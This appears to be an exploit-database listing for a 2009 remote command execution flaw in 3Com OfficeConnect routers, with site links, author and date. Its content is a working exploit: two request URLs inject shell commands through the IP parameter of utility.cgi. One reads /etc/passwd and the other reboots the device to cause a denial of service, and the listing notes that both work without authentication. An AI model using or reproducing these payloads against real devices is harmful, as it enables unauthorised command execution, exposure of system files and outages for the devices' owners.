3Com OfficeConnect code execution

Exploit Datenbank (exploit-db.com)
CVE Datenbank (cve.mitre.org)
OSVDB Datenbank (osvdb.org)
Mark Joseph Edwards 19.10.2009 Verified
Remote Exploits Hardware

Exploit Code

Code Download 
####### Remote command execution  #######

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || cat /etc/passwd

To see the command output you need to log into the router, however the
command is executed even the user is not logged in, so if you don't
have access to the device a DOS is also possible:

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || reboot